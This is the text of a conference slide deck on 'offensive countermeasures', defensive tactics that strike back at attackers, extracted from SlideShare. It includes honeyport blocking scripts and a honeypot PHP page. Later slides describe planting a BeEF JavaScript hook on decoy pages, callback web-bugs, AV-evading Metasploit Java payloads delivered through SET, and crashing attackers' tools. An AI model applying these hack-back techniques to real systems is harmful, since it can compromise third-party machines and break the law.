Paul Asadoorian - Bringing Sexy Back

3,513 views

Published on

Published in: Technology, Business
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,513
On SlideShare
0
From Embeds
0
Number of Embeds
116
Actions
Shares
0
Downloads
43
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Paul Asadoorian - Bringing Sexy Back

  1. 1. Bringing Sexy Back:Defensive Measures That Actually Work Paul Asadoorian (paul@pauldotcom.com) John Strand (john@pauldotcom.com) http://pauldotcom.com
  2. 2. Paul Asadoorian 2
  3. 3. 3
  4. 4. http://pauldotcom.com
  5. 5. Goal: Bring Sexy Back
  6. 6. Outline• # whoami• Introduc-on
‐
OODA,
Don’t
run
away• Case
Studies
‐
Reasons
why
we
CAN
do
this• Warning
banners
‐
Allows
you
to
do
things
you
disclose• Annoyance
‐
Mr.
Clippy,
User
Agent,
Spider
Traps• A9ribu-on
‐
BeEF,
Metasploit
Decloak• A9ack
‐
SET,
Java
payloads,
purple
ASCII
art h"p://pauldotcom.com
 11
  7. 7. IntroductionYes, I said “Hacking Back” but don’t run away 12
  8. 8. DisclaimerThe contents of this presentation may get you intotrouble. In fact, conventional wisdom stipulatesthat everything we are going to discuss is a “badidea.” Make sure you vet any tactics in thispresentation by your legal team and uppermanagement first.Any action you take from this presentation shouldbe documented in writing before implementing. h"p://pauldotcom.com
 13
  9. 9. First off, why are we talking about “hacking back”? 14
  10. 10. Successful
Penetra-on
Tests• Most
organizaOons
provide
easy
 access
to
their
“intellectual
 property” • How
many
pen
tests
have
you
been
 on? • How
many
of
those
were
successful?• Or? • How
many
women
have
you
dated? • How
many
have
you
slept
with? h"p://pauldotcom.com
 15
  11. 11. Why Are Penetration Tests Always So Successful? 16
  12. 12. 1.
Flimsy
Defensive
“Layers” h"p://pauldotcom.com
 17
  13. 13. 2.
Social
EngineeringBecause there is no patch for human stupidity... h"p://pauldotcom.com
 18
  14. 14. 3.
Passwords h"p://pauldotcom.com
 19
  15. 15. 4.
SoLware
Vulnerabili-es h"p://pauldotcom.com
 20
  16. 16. John
&
Paul
Then
Thought• We
can
do
be"er• What
if
we
were
to
defend
 systems,
applying
what
we
know
 about
a"acks?• For
so
long
we’ve
gone
down
the
 beaten
path
that
we
call
 “security”• Its
Ome
to
break
the
mold We
also
thought
about
how
 messy
we
get
when
ea-ng
 noodles,
but
someone
beat
 us
to
the
solu-on... h"p://pauldotcom.com
 21
  17. 17. Why
Use
Offensive
Counter
Measures?• There
are
Omes
where
you
will
be
required
to
do
“more” • In
parOcular
when
working
with
law
enforcement• The
a"ackers
are
ge^ng
more
and
more
brazen • Very
li"le
perceived
risk
on
their
part • We
have
rules,
they
don’t
follow
rules• You
may
need
to
figure
out
what
an
a"acker
is
aber
or
 gather
informaOon
about
them • e.g.
If
they
are
a"acking
from
a
bot‐net
or
through
TOR h"p://pauldotcom.com
 22
  18. 18. OODA
• Whomever
can
do
these
things
the
fastest
 lives: • Observe
 • Orient • Decide John
Boyd • Act• Originally
developed
for
fighter‐pilots• With
current
security
models
how
many
 can
you
impact?• Works
both
ways,
Dis‐Orient
a"ackers! Paul,
“figh-ng” h"p://pauldotcom.com
 23
  19. 19. Case StudiesStuff other people did that makeswhat we’re going to do look okay 24
  20. 20. Case
Study:
Consent
to
University
Network
Terms• Sysadmin
hacks
into
threatening
machine
 • Gathered
evidence
used
against
student
using
temp/temp
creds • Student’s
consent
to
university
terms
jusOfies
sysadmin • U.S.
v.
Heckenkamp• Kevin
Poulsen,
“Court
Okays
Counter‐Hack
of
eBay
Hackers
 Computer,”
Threat
Level,
April
6,
2007,
 • h"p://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html
“A federal appeals court just shot down an a4empt by confessed superhacker Jerome Heckenkamp to overturn his computer crime convic=ons, which were an end result of informa=on provided by a university sysadmin who broke into Heckenkamp’s computer to gather evidence.” h"p://pauldotcom.com
 25
  21. 21. Case
Study:
Public
Example
of
Reflected
A9ack• 1999
‐
World
Trade
OrganizaOon
web
site• DOS
a"ack
from
E‐Hippies
CoaliOon• HosOng
service
Conxion
reflected
the
a"ack
back
to
E‐ Hippies
and
disabled
its
web
site• Conxion
not
prosecuted • h"p://www.networkworld.com/research/2000/0529feat2.html
 "So we told our filtering soFware to redirect any packets  coming from these machines back at the e‐hippies Web server" h"p://pauldotcom.com
 26
  22. 22. Case
Study:
MSFT
Court
Order
–
Botnet• Civil
lawsuit
2010• Court
issues
order
to
suspend
the
domains
associated
with
 the
Waledac
botnet• MSFT
takes
“other
technical
measures”
to
degrade
the
 botnet • www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber‐Defense‐ Law‐Botnet‐Computer‐Crime‐Lawsuit
 “No=ce that MicrosoF is not doing this in the dark. It is working  through our open public court system, so that MicrosoF is  transparent and accountable and all can see what is happening  and evaluate it.” h"p://pauldotcom.com
 27
  23. 23. Case
Study:
DOJ
Takes
Over
2
Million
 Node
Botnet• A
judge
gave
permission
to
FBI
and
U.S.
Marshals
 to
setup
servers
to
stop
the
Coreflood
botnet• They
were
also
given
permission
to
“to
send
 commands
to
infected
computers
that
stops
the
 Coreflood
virus”• They
seized
5
servers
and
29
domain
names• DOJ
now
owns
2.5
million
computers
on
the
 Internet,
and
will
essenOally
tell
the
malware
to
 self‐destruct• What,
this
isn’t
sexy
enough
for
you? h"p://pauldotcom.com
 28
  24. 24. Lets
Pretend
I’m
a
Lawyer• I’m
advising
you
to: • Discuss • Document • Plan• Consult
with
others,
reveal
your
plans!• Hiding
intenOons
means
you
think
what
 you
are
doing
is
"wrong”• Rule
of
thumb:
Don’t
be
evil Note:
We
love
the
EFF
 (eff.org
go
donate!) • While
it
can
seem
like
a
lot
of
fun,
it
can
get
you
 in
big
trouble
 h"p://pauldotcom.com
 29
  25. 25. Okay,
Lets
Stop
Pretending• Could
this
get
you
into
trouble? • Possibly.
There
is
s-ll
some
debate
on
how
to
do
it
properly• There
are
a
few
things
we
can
avoid
to
keep
us
from
 ge^ng
in
trouble • Don’t
ever
put
malware
where
it
is
publicly
accessible • Don’t
make
it
to
easy
to
get
to• Use
Warning
Banners... h"p://pauldotcom.com
 30
  26. 26. Warning BannersWarning, we are going to talk about warning banners... 31
  27. 27. Look
at
Your
Warning
Banner• There
is
a
lot
in
there
about
permission• There
are
a
number
of
technologies
that
 will
“check”
your
system
before
it
 accesses
the
network • OpenVPN
scripts
(Like
a
NAC
Check) • Windows
2008
Network
Access
ProtecOon• Is
it
possible
to
use
this
as
a
means
to
 gather
some
informaOon
about
an
 a"acker
system?• Put
in
your
warning
banner
that
you
can
 do
what
you
want! h"p://pauldotcom.com
 32
  28. 28. Example:
Eric
Needed
a
Warning
Banner• What
does
a
kitchen
knife,
a
crutch,
and
ductape
have
to
 do
with
anything?• It
is
illegal
to
set
up
lethal
traps
for
trespassers• However,
if
you
tell
them
there
may
be
evil
things
on
your
 network/property
you
warned
them "super
went
to
open
the
door,
felt
resistance
and
found
the
 rigged
 contrap-on"‐‐
 a
 big
 knife
 duct‐taped
 to
 a
 crutch,
 which
was
installed
with
an
elas-c
cord.
The
super
was
not
 injured. Eric
 Stetz
 was
 arrested
 and
 charged
 with
 reckless
 endangerment
for
a
vicious‐looking
booby
trap. h"p://gothamist.com/2008/04/06/homemade_booby.php h"p://pauldotcom.com
 33
  29. 29. WARNING: There is a knife duct taped to a crutch attached to an elastic band. Enter at your own risk! Would this have kept Eric Stetz out of trouble?
  30. 30. FREE VASECTOMYThis likely would not have kept Eric Stetz out of trouble...
  31. 31. Reality
Check:
Don’t
Be
Stupid
(like
Eric)• How
could
this
go
wrong
for
you? • Dumb
moves
(like
knife
crutches) • Easily
accessible
malware
(e.g.
traps) • Full
a"acks
of
a"acker
IP
addresses • Purposely
damaging
systems • Persistent
long‐term
access
to
bad
guys• We
have
smarter
opOons
to
work
with 1. Annoyance 2. A9ribu-on 3. A9ack h"p://pauldotcom.com
 36
  32. 32. AnnoyanceStressing out the attackers... 37
  33. 33. Annoyance:
HoneyPorts• Forces
a"ackers
to
make
a
full
connecOon
to
 avoid
spoofing
piralls• A"ackers
and
testers
hate
this……..@echo offfor /L %%i in (1,1,1) do @for /f"tokens=3" %%j in (netstat -nao ^| find ^":3333^") do@for /f "tokens=1 delims=:" %%k in("%%j") do netsh advfirewall firewall addrulename="WTF" dir=in remoteip=%%klocalport=any protocol=TCP action=block If
a
machine
makes
a
full
TCP
conne-on
to
port
3333,
a
 firewall
rule
is
added
to
block
the
source
IP
address h"p://pauldotcom.com
 38
  34. 34. Annoyance:
HoneyPorts• Works
on
Linux
too
of
course,
same
concept• Must
have
working
copy
of
Netcat
on
your
system• Should
be
modified
to
log
enOres
and
report
back
to
 enterprise
SIEM [root@linux ~]# while [ 1 ] ; echo "started" ; do IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP ; done h"p://pauldotcom.com
 39
  35. 35. Annoyance:
Mr.
Clippy• Through
PHPIDS
we
can
make
 a"acking
a
website
“interesOng”• First,
install
PHPIDS• PHPIDS
has
clipping
threshholds• Then
create
a
rule
to
all
a"ackers
to
 pull
up
Mr.
Clippy h"p://pauldotcom.com
 40
  36. 36. Annoyance:Making
Your
Website
Look
Like
Something
Else Oh,
your
IIS,
here
are
all
my
IIS
a9acks! h"p://pauldotcom.com
 41
  37. 37. Annoyance:
Filter
User‐Agent
Strings
• Filter
the
User‐Agents
in
use
by
a"ackers
and
testers: • Nikto,
AcuneOx,
“IamHackingYou”• Sites
do
not
lock
down
the
mobile
version
of
web
site • There
has
been
a
lot
of
research
in
this
area
by
Chris
John
Riley • E.g
Using
the
iPhone
User‐Agent
revels
mobile
version
of
site • Some
people
don’t
secure
the
mobile
version• What
if
you
present
traps
or
DoS
condiOons
based
on
User‐ Agent? h"p://pauldotcom.com
 42
  38. 38. Annoyance:
Messing
with
A9ackers
Heads<?php$ip = getenv(REMOTE_ADDR);$useragent = getenv(HTTP_USER_AGENT);$to = "yournonproductionemail@example.com";$subject = "Robots honeypot from " . $ip;$body = "User at " . $ip . " tripped robots honeypot.nUser-Agent was:" . $useragent;mail($to, $subject, $body);echo("<html><h1>Congratulations, you found the secret page. Now email" . $to . " to avoid being blacklisted.</h1></html>");echo("Your IP address is: " . $ip . "n");echo("Your User Agent is: " . $useragent . "n");?>Credit
Josh
Wright:
h9p://mail.pauldotcom.com/pipermail/pauldotcom/2009‐February/000713.html h"p://pauldotcom.com
 43
  39. 39. Annoyance:
Messing
with
A9ackers
Heads This
all
happened
in
 the
same
day! Fun
part
is
we
get
to
 make
things
up
as
to
 why
this
 happened... h"p://pauldotcom.com
 44
  40. 40. Annoyance:
Evil
Web
Servers• Many
testers
and
a"ackers
use
automated
crawling • This
helps
idenOfy
pages
and
possible
inserOon
points
for
their
 a"acks •If
they
say
they
don’t,
they
are
probably
lying• *Maybe*
there
is
a
way
to
a"ack
the
tools • Se^ng
up
a
DoS
condiOon
for
their
automated
scanner• Note:
This
is
not
something
you
want
to
try
on
an
external
 webserver
that
you
want
to
have
crawled
by
Google • Configure
robots.txt
to
point
to
resources
you
control
 • NOT
something
you
put
in
your
index.php
page! h"p://pauldotcom.com
 45
  41. 41. Exploi-ng
Exis-ng
Vulnerabili-es• AccuneOx
DoS
in
Sniffer
Component • h"p://www.symantec.com/business/security_response/ a"acksignatures/detail.jsp?asid=23507• Webinspect
Crashes
Loading
Reports • h"p://seclists.org/educause/2009/q3/526
“We can run the scans but if you  select a report that has cri=cal vulnerabili=es in it the report generator  crashes with invalid characters.”• AppScan
VulnerabiliOes • SSL:
h"ps://www‐304.ibm.com/support/docview.wss?uid=swg1PM24290
 • Login
Recording:
h"ps://www‐304.ibm.com/support/docview.wss? uid=swg1PM04998 h"p://pauldotcom.com
 46
  42. 42. Evil
Annoyance:
Fuzzing
A9acker
Tools• Why
not
browse
the
a"ackers/testers
tools?• There
are
a
number
of
different
browser
 fuzzers
available • Bf3,
Sully,
Python• We
can
also
use
DOM‐Hanoi • Geared
towards
browser
fuzzing,
but
hey.

It
works • Actually,
it
just
takes
a
long
Ome
to
run• Goal:
Build
a
page
that
consistantly
crashes
 the
a9ackers
tool! h"p://pauldotcom.com
 47
  43. 43. Annoyance:
Semng
Traps h"p://pauldotcom.com
 48
  44. 44. SpiderTrap
&
WebLabyrinth• Spidertrap:
Small
Python
script
to
trap
web
spiders• Ben
Jackson
created
a
PHP
version
called
WebLabyrinth• It
is
PHP
so
you
can
load
it
in
your
web
infrastructure• Has
a
number
of
cool
features • Gently
tells
Googlebot
to
go
away • Random
HTTP
codes • *NEW*
Database
Support • *NEW*
AlerOng
with
IDS‐style

rules• David
Bowie
Approved h"p://pauldotcom.com
 49
  45. 45. Preven-on:
Nessus
Example h"p://pauldotcom.com
 50
  46. 46. Keeping
it
“Real” h"p://pauldotcom.com
 51
  47. 47. Wget:
Falling
Into
The
Trap h"p://pauldotcom.com
 52
  48. 48. Now
for
W3AF h"p://pauldotcom.com
 53
  49. 49. This
is
Going
to
Take
a
While... Also
annoying h"p://pauldotcom.com
 54
  50. 50. Helps
the
Internet
Be
a
Be9er
Place?The
IP
Address
209.20.92.14
wondered
into
the
labyrinth:[17/Mar/2011:21:32:03 +0000] [209.20.92.14/sid#19367c8][rid#26616d8/initial] (1) redirectto http://securityfail.com/labyrinth/[REDIRECT/302]“/admin”
on
my
server
redirects
people
or
bots
to
the
labyrinth:209.190.23.66 - - [17/Mar/2011:21:32:03 +0000]"GET //admin/ HTTP/1.1" 302 192 "-" "Made byZmEu @ WhiteHat Team - www.whitehat.ro" Interes-ng
User
Agent,
eh? h"p://pauldotcom.com
 55
  51. 51. Helps
the
Internet
Be
a
Be9er
Place?• Turns
out
“ZmEu”
is
a
popular
string
for
the
user
agent
to
 contain
for
bots
looking
for
insecure
web
applicaOons• If
the
automated
bots
waste
Ome
in
my
labyrinth,
thats
 less
Ome
they
spend
a"acking
other
sites• Its
also
less
Ome
they
spend
on
my
own
site
trying
lame
 a"acks,
that
likely
would
not
work
anyway• My
“traps”
should
also
spring
on
some
of
the
following
 requests
as
well:[client
209.190.23.66]
File
does
not
exist:
/var/lib/mediawiki/phpmyadmin[client
209.190.23.66]
File
does
not
exist:
/var/lib/mediawiki/phpMyAdmin[client
209.190.23.66]
File
does
not
exist:
/var/lib/mediawiki/dbadmin[client
209.190.23.66]
File
does
not
exist:
/var/lib/mediawiki/myadmin[client
209.190.23.66]
File
does
not
exist:
/var/lib/mediawiki/MyAdmin h"p://pauldotcom.com
 56
  52. 52. Laughing
at
me
or
laughing
at
them?• Nice
to
see
a"ackers
are
smiling
at
me,
or
not• MulOple
a"empts
from
different
IPs
across
mulOple
 servers• About
“anO‐sec”: The Anti Security Movement (also written as antisec and anti-sec or antii-sec) is a popular[citation needed]movement opposed to the computer security industry. It attempts to censor the publication of information relating to but not limited to: software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets and distribution points of that information.[client 68.178.200.178] File does not exist: /var/lib/mediawiki/w00tw00t.at.blackhats.romanian.anti-sec:)65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu" h"p://pauldotcom.com
 57
  53. 53. AttributionI can still see you... 58
  54. 54. Protec-ng
Your
Intellectual
Property• “Callbacks”
‐
Similar
to
Sobware
updates • Sends
informaOon
back
to
home
base
about
system • IP
address,
hardware
and
sobware
configuraOons • Microsob
Genuine
Advantage,
crash
dumps• Tracking
sobware
in
phones • Just
look
at
Android...

Does
“checkers”
really
need
access
to
my
 contact
list
and
call
history?• We
are
not
necessary
talking
about
“hacking”
per
se • We
are
talking
about
ge^ng
a"ribuOon h"p://pauldotcom.com
 59
  55. 55. Send
my
informa-on
to
MicrosoL? h"p://pauldotcom.com
 60
  56. 56. Word
Web‐Bugs• Feature
built
into
exploit
frameworks
for
penetraOon
tesOng• This
tacOc
works
great
at
tracking
intellectual
property• Not
all
ways
of
a"ribuOon
need
result
in
shell
access• Far
less
likely
to
crash
a
system• Embed
this
code
in
a
spreadsheet
called
SSN.xls
and
watch
how
fast
an
 a"acker
runs
the
macros• Callback
should
go
to
a
closely
monitored
system This
is
like
Spy
Stuff,
 like
James
Bond... “Ohhhhhh
James...” See,
Defense
IS
Sexy!
 Eh? h"p://pauldotcom.com
 61
  57. 57. How
does
it
work?• It
simply
inserts
a
reference
to
a
css
running
on
the
system,
 in
this
case,
running
Core
IMPACT• When
the
doc
is
opened
it
tries
to
open
the
URL• Direct
connecOon! h"p://pauldotcom.com
 62
  58. 58. Web
Applica-on
Street
figh-ng• How
can
we
use
JavaScript
against
the
a"ackers?• BeEF
(Browser
ExploitaOon
Framework) • Harvest
informaOon • Send
direct
links • Possibly
exploit
their
systems
(XMLRPC)• Maybe
we
could
just
mess
with
them • Send
indicaOons
of
XSS
and
SQLi
in
every
response
to
their
a"acks• We
need
to
have
a
wide
variety
of
tools
and
techniques h"p://pauldotcom.com
 63
  59. 59. h"p://pauldotcom.com
 64
  60. 60. BeEF:
Get
the
a9acker
to
connect• Lead
the
a"acker
to
decoy
site
that
no
legit
user
would
visit• Example:
robots.txt: User-agent: * Disallow: /admin/admin.php• Example:
admin.php
displays
a
bogus
login
page• Hidden
in
admin.php
is
“The
Hook:• <script
language=Javascript
src="h"p://<your
server>/beef/ hook/beefmagic.js.php></script>
 I
like
ninja
grappling
hooks.... h"p://pauldotcom.com
 65
  61. 61. h"p://pauldotcom.com
 66
  62. 62. h"p://pauldotcom.com
 67
  63. 63. Hooked
on
BeEF:
Now
what?• CapabiliOes
are
broad • Gather
info • Browser
type
and
version,
OS
type
and
version,
screen
resoluOon,
 etc. • Simple
popup: h"p://pauldotcom.com
 68
  64. 64. A9ackers
use
IIS
6.0?
No
Way!h"p://pauldotcom.com
 69
  65. 65. BeEF
Modules• The
issue
is
deciding
how
far
to
go • Do
you
cross
the
line
between
info
gathering
 and
a"acking
the
a"acker(s)
system? • You
can
do
that
with
BeEF,
not
saying
that
you
 should,
but
you
can
if
you
have
permission• Cross
the
line:
Many
built‐in
modules • Metasploit
integraOon:
Browser
Autopwn,
 SMB
Challenge
Theb,
etc. • DoS
may
be
okay,
and
this
seems
like
a
good
 place
to
build
a
DoS
for
your
favorite,
or
not
to
 favorite,
hacking
tool • Example:
Find
an
exploit
for
Nikto
and
put
it
 into
BeEF h"p://pauldotcom.com
 70
  66. 66. BeEF
Modules
(2) Send
them
to
your
compe--on Who
are
they
really? How
are
they
hiding? Who
else
have
they
hacked? h"p://pauldotcom.com
 71
  67. 67. A9ribu-on:
Decloak• From
the
Metsploit
project • More
informaOon
h"p://decloak.net/
 • Great
place
to
redirect
users
from
 robots.txt • Many
a"ackers
and
penetraOon
testers
 will
use
proxies
and/or
Tor
to
hide
their
 IP
address • Decloak
can
reveal
the
real
IP
address
 of
the
scanner “This tool demonstrates a system for iden=fying the real IP address of  a web user, regardless of proxy seOngs, using a combina=on of client‐ side technologies and custom services.” h"p://pauldotcom.com
 72
  68. 68. Looking
at
the
Components
of
Decloak h"p://pauldotcom.com
 73
  69. 69. Now,
for
Java h"p://pauldotcom.com
 74
  70. 70. The
DNS
Server h"p://pauldotcom.com
 75
  71. 71. Compile
and
Start h"p://pauldotcom.com
 76
  72. 72. Now,
Surf
to
Your
Linux
System h"p://pauldotcom.com
 77
  73. 73. Checking
the
Database 1 4 32 56 h"p://pauldotcom.com
 78
  74. 74. Viewing
the
Data h"p://pauldotcom.com
 79
  75. 75. Wireless
Countermeasure
Example• Step
1:
Setup
a
hidden
SSID
(“private”
or
“guest”)• Step
2:
Use
a
capOve
portal
when
people
connect
to
it• Step
3:
Portal
login
page
contains
Beef
hook
or
SET
 exploit
(use
your
warning
banner!)• Step
4:
Collect
informaOon
about
a"acker
(dissolvable
 agents)• Step
5:
(OPTIONAL)
Ban
Wifi
Mac
on
WIPS
and/or
 Wireless
network
(works
unOl
they
change
it) h"p://pauldotcom.com
 80
  76. 76. Gotchas• Make
sure
SSID
has
access
to
nothing
or
just
more
 honeypots• Tough
one:
Prevent
real
users
from
connecOng
to
it• Tougher
one:
Make
a"ackers
think
its
a
real
SSID
&
 network• Danger:
Make
sure
your
BEeF
server
is
not
a
jumping
off
 point Pwning
yourself
is
not
fun h"p://pauldotcom.com
 81
  77. 77. Wireless:
More
Thoughts• Send
wireless
driver
exploits
on
the
network,
triggered
by
 some
event • Easily
will
backfire...• Answer
to
clients
probing
for
non‐producOon
networks,
 send
them
to
a
page
that
tells
them
they
are
mis‐ configured
(beat
the
a"ackers
to
it) • May
really
piss
off
users• Bluetooth
Canary
‐
Leave
Bluetooth
phone
with
OBEX
 enabled • Have
address
book
with
numbers
that
all
route
to
you h"p://pauldotcom.com
 82
  78. 78. AttackGopher is an old protocol too... 83
  79. 79. A9ack:
Java
Payload• If
we
can
get
an
a"acker
to
load
a
Java
payload,
why
not
 give
them
something
interesOng,
like
a
Metaploit
payload?• Java
payloads
are
awesome
for
penetraOon
testers,
no
 vulnerabiliOes
required!• They
can
also
be
useful
for
a"ackers... Just
for
@beaker
 and
@a9ri-on h"p://pauldotcom.com
 84
  80. 80. Evil
Java
Applica-on• Embed
a
malicious
Java
ApplicaOon
in
a
non‐producOon
 web
server • Usually
in
a
directory
that
is
noindex
and/or
nofollow
in
robots.txt• The
a"acker/vicOm
will
get
a
pop‐up
asking
if
they
want
to
 open
the
Java
applicaOon
• They
will,
a"ackers
tend
to
be
very
curious
• The
payload
can
be
flexible
(Shell,
Rootkit,
VNC)• You
can
automaOcally
run
enumeraOon
scripts
when
the
 a"acker/vicOm
runs
the
applicaOon h"p://pauldotcom.com
 85
  81. 81. Browsing
to
Your
Site h"p://[Your
Linux
IP] Everyone
Clicks
“Run” h"p://pauldotcom.com
 86
  82. 82. Configuring
SETDave
Kennedy,
the
author
of
SET,
loves
purple. h"p://pauldotcom.com
 87
  83. 83. Website
A9acks
are
Key h"p://pauldotcom.com
 88
  84. 84. Using
Java...
Glorious
Java h"p://pauldotcom.com
 89
  85. 85. Default
Templates h"p://pauldotcom.com
 90
  86. 86. Choosing
your
Payload h"p://pauldotcom.com
 91
  87. 87. Encoding
to
Dodge
AV h"p://pauldotcom.com
 92
  88. 88. You
Say
YES!! h"p://pauldotcom.com
 93
  89. 89. Have
Your
Backtrack
System
Surf
to
SET h"p://pauldotcom.com
 94
  90. 90. Not
Pre9y..
But
it
Works h"p://pauldotcom.com
 95
  91. 91. Precau-ons
and
Usage• Put
this
on
the
inside
of
the
network• Careful
an
a"acker
doesn’t
redirect
your
users• Make
sure
no
one
can
take
over
your
Metasploit
instance• Don’t
have
to
do
any
thing
with
the
shell • You
can
autorun
certain
non‐damaging
commands • ping
your
system h"p://pauldotcom.com
 96
  92. 92. Listen- http://pauldotcom.com/radio (24/7)- Podcast in iTunes (audio/video)Watch- Live! http://pauldotcom.com/live- “TV” http://pauldotcom.blip.tv
  93. 93. Participate- Mailing List: http://mail.pauldotcom.com- Community: http://pauldotcom.com/insider- IRC: irc.freenode.net #pauldotcomRead- http://pauldotcom.com (Blog)- Email us psw@pauldotcom.com
  94. 94. Want More? (Shameless Plug)OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK Black Hat Las Vegas 2011 Register Today!
  95. 95. The EndWake up, time for Questions?

×